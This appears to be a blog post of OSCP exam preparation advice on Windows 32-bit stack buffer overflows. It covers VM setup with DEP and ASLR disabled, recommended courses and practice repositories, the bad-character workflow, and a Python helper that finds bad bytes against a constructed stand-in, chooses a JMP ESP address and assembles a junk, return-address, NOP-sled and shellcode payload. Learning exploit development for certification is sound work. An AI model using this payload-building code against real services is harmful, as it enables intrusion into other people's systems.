Buffer Overflows – learn to love assembly and hex.
Before my PWK lab time started, I spent three weeks working on buffer overflows. Luckily, I learned a little ASM (Turbo ASM!!!!) many a year ago. I learned a little more in college, but that was a hot minute ago.
But for three weeks I decided to jump into the thing that scares a lot of people but is very easy to master at the level required for the exam. The BOF is the “free points” of the exam.
My best advice, grab an evaluation copy of Windows 7 32-bit and/or WinXP or Server 2003 and spin up a VM. Install Immunity Debugger, Mona, some vulnerable software, and start exploiting.
If you’re using a Windows 7 VM you’ll want to disable DEP and ASLR. There are a few ways to do it, including changing some registry keys, but my approach was to use Microsoft’s Enhanced Mitigation Experience Toolkit (EMET). Also be warned that something vulnerable on XP/2003 often won’t work on 7 as-is, because the modules load at different addresses and the JMP ESP you find may sit at an address that contains bad characters.
A big help to me, after I watched some videos and started to remember exactly how the stack works, was to run through a bunch of the vulnerable programs on https://github.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice. Freddie’s skeleton exploits, half-done exploits, etc. all helped me get through each stage.
But before you jump into half-done things, learn the process from start to finish. Highly recommended, and for good reason, is Georgia Weidman’s course on Cybrary and also her book. A little birdie told me she’s coming out with a new edition of the book and I’ll tots buy it.
Start polishing your skills (or just start out doing things well) by checking out dostackbufferoverflowgood and going through the PDF. Justinsteven does an excellent job of explaining things and helping you learn some tricks that will make doing a BOF easier.
So what you’ll need to know for the exam: do the buffer overflow in the course materials, then do a bunch more. Be able to run through one start to finish in an hour. You’ll hear a lot of “watch out for bad characters” advice, so learn how to identify them, and also learn which bytes have a special meaning to the kind of service you’re attacking. An FTP server probably has different bad characters than a mail server; read the RFCs for both. But definitely learn how to identify bad characters the old-fashioned way (send the 0x01–0xff array, compare what lands in memory with what you sent, drop the first byte that breaks it, repeat) and think of some new and creative ways to identify them. If you’re almost all the way through the array and you have 25 bad characters, you’re doing something wrong (a single bad byte usually mangles or truncates everything after it, which is why you remove them one at a time), so start over.
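The bad-character loop and the address check described above, as an added example (this is not code from the original post or from any of the linked repositories). The target here is a constructed stand-in, a line-based parser that stops reading at CR or LF, standing in for whatever you would actually read back from Immunity; the candidate JMP ESP addresses and the bad-character list are constructed for the demo, not taken from any real binary.

```python
"""Bad-character and return-address helpers for an exam-style win32 stack overflow.

Added example. Everything below is constructed for illustration: the fake
target, the candidate addresses and the bad-byte list are not from a real binary.
"""
import struct


def badchar_array(exclude=(0x00,)):
    """Bytes 0x01..0xff with the already-known bad bytes removed (0x00 is almost always bad)."""
    drop = set(exclude)
    return bytes(b for b in range(0x00, 0x100) if b not in drop)


def compare_dump(sent, received):
    """Compare the array you sent with what landed in memory.

    Returns the first byte that was altered or cut off, or None when the array
    is intact. Only the first mismatch matters: one bad byte usually mangles or
    truncates everything after it, which is why bad bytes are removed one at a time.
    """
    for i, (a, b) in enumerate(zip(sent, received)):
        if a != b:
            return sent[i]
    if len(received) < len(sent):
        return sent[len(received)]
    return None


def find_badchars(roundtrip, known=(0x00,), limit=25):
    """Repeat send/compare, adding one bad byte per round, until the array comes back clean.

    `roundtrip(data)` stands for "send data, read the same region back from the
    debugger". Hitting `limit` bad bytes means something else is wrong (offset,
    crash, or the byte that corrupts the rest of the array), so stop and start over.
    """
    bad = list(known)
    while True:
        sent = badchar_array(exclude=bad)
        culprit = compare_dump(sent, roundtrip(sent))
        if culprit is None:
            return bad
        bad.append(culprit)
        if len(bad) >= limit:
            raise RuntimeError("too many bad characters; re-check the crash and start over")


def pack_address(addr):
    """Pack a 32-bit address little-endian, the byte order it must appear in on the stack."""
    return struct.pack("<I", addr)


def has_badchars(data, badchars):
    """Sorted list of bad bytes present in data (empty when the data is clean)."""
    bad = set(badchars)
    return sorted({b for b in data if b in bad})


def choose_jmp_esp(candidates, badchars):
    """First candidate JMP ESP address whose packed bytes contain no bad characters, else None."""
    for addr in candidates:
        if not has_badchars(pack_address(addr), badchars):
            return addr
    return None


def build_payload(offset, ret_addr, shellcode, nops=16, total=None):
    """junk + EIP + NOP sled + shellcode, optionally padded to the length the crash needs."""
    payload = b"A" * offset + pack_address(ret_addr) + b"\x90" * nops + shellcode
    if total is not None:
        if len(payload) > total:
            raise ValueError("payload longer than the crashing buffer")
        payload += b"C" * (total - len(payload))
    return payload


def constructed_roundtrip(data):
    """Constructed stand-in for the target: a line-based parser that stops at CR or LF."""
    for i, b in enumerate(data):
        if b in (0x0A, 0x0D):
            return data[:i]
    return data


# Constructed demo values: one address with 0x0a/0x0d in it, one clean.
DEMO_CANDIDATES = (0x0A0B0C0D, 0x7C8369F0)

if __name__ == "__main__":
    bad = find_badchars(constructed_roundtrip)
    print("bad chars:", [hex(b) for b in bad])
    jmp = choose_jmp_esp(DEMO_CANDIDATES, bad)
    print("usable JMP ESP:", hex(jmp))
    print(build_payload(4, jmp, b"\xcc", nops=2, total=12))
```

Against a real target, `constructed_roundtrip` is replaced by sending the array over the socket and reading the bytes at ESP out of the debugger (or pasting a Mona comparison result); the rest of the loop is unchanged. The `limit` guard is the "25 bad characters" rule from the paragraph above turned into code.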
Now, don’t do what Danny Don’t Do does – I got very proficient at BOFs before my PWK lab time started and touched them twice after my lab time started. After three months, I got a little rusty. That easy 25 points in an hour turned into three hours for me and was slightly de-motivating. Stay sharp. Stay frosty.
And in case you want to see some fine examples of really poor coding and even worse project management check out the exploits I wrote/modified: https://gitlab.com/darkestofdans/win32-buffer-overflow-practice
OSCP pro tip: learn to use git. Make a private repository. Part of the reporting for OSCP is showing what changes you made to an exploit; git makes that easy, since you commit the original exploit first, commit each change, and view the differences between them.